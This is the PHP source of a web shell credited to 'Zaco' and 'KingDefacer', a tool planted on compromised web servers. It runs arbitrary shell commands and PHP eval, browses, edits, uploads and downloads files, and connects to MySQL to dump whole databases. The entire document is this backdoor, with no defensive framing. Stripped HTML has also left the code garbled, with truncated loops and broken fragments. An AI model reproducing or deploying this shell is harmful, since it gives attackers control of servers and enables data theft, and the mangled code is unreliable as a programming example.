Small Web Shell By Zaco - Edited By KingDefacer
headka;
$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
$winda=strpos(strtolower(php_uname()),'wind');
define('format',50);
$pages='###cmd ###mysql ###eval ### '.($winda===false?'id :'.`id`:'');
switch($page) { case 'eval': { $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
$eval_value=magic_q($eval_value);
$action=isset($_POST['action'])?$_POST['action']:'eval';
if($action=='eval_in_html') @eval($eval_value);
else { echo($head.$pages);
?>
'>
without arch
gzip archive
'.htmlspecialchars($cmd)." \n\n".htmlspecialchars(`$cmd`)."\n ");
} else { $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
if(@is_dir($work_dir)) { echo('Listing '.$e_work_dir.' ');
$handle=@opendir($work_dir);
if($handle) { while(false!==($fn=readdir($handle))){$files[]=$fn;
};
@closedir($handle);
sort($files);
$not_dirs=array();
for($i=0;
$i'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).' '.str_repeat(' ',format-strlen($fn)));
if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
} echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
} else {$not_dirs[]=$fn;
} } for($i=0;
$i'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).''.str_repeat(' ',format-strlen($fn)));
if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
} echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
} echo(' ');
?>
'.$e_work_dir." Edit\n");
$f=@fopen($work_dir,'r');
?>
phpif(!($f))echo($e_work_dir.' not exists');
else while(!feof($f))echo htmlspecialchars(fread($f,100000))
?>
Error '.$e_work_dir."\n");
else { fwrite($f,$file_text);
fclose($f);
echo(''.$e_work_dir." is saving \n");
} break;
} } break;
} break;
} case 'upload' : { if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
$f=$_FILES["filename"]["name"];
if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
else { echo('file is uploaded in '.$e_work_dir);
} break;
} case 'download' : { $fname=isset($_POST['fname'])?$_POST['fname']:'';
$temp_file=isset($_POST['temp_file'])?'on':'nn';
$f=@fopen($fname,'r');
if(!($f)) echo('file is not exists');
else { $archive=isset($_POST['archive'])?$_POST['archive']:'';
if($archive=='gzip') { Header("Content-Type:application/x-gzip\n");
$s=gzencode(fread($f,filesize($fname)));
Header('Content-Length: '.strlen($s)."\n");
Header('Content-Disposition: attachment;
filename="'.str_replace('/','-',$fname).".gz\n\n");
echo($s);
} else { Header("Content-Type:application/octet-stream\n");
Header('Content-Length: '.filesize($fname)."\n");
Header('Content-Disposition: attachment;
filename="'.str_replace('/','-',$fname)."\n\n");
ob_start();
while(feof($f)===false) { echo(fread($f,10000));
ob_flush();
} } } } } break;
} case 'mysql' : { $action=isset($_POST['action'])?$_POST['action']:'query';
$user=isset($_POST['user'])?$_POST['user']:'';
$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
$db=isset($_POST['db'])?$_POST['db']:'';
$host=isset($_POST['host'])?$_POST['host']:'localhost';
$query=isset($_POST['query'])?magic_q($_POST['query']):'';
switch($action) { case 'dump' : { $mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else { $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
$archive=isset($_POST['archive'])?$_POST['archive']:'none';
if($archive!=='none')$to_file=false;
$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
else { $dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
ob_start();
if($to_file){$t_f=@fopen($to_file,'w');
if(!$t_f)die('Cant opening '.$to_file);
}else $t_f=false;
if($table_dump=='') { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment;
filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
} $result=mysql_query('show tables',$mysql_link);
for($i=0;
$i
\n");
for($i=0;
$i'.htmlspecialchars(mysql_field_name($result,$i)).' ');
echo("\n \n");
for($i=0;
$i');
for($j=0;
$j'.(htmlspecialchars($rows[$j])).'');
} echo("\n");
} echo("\n");
} mysql_close($mysql_link);
} break;
} } break;
} }
echo '';
?>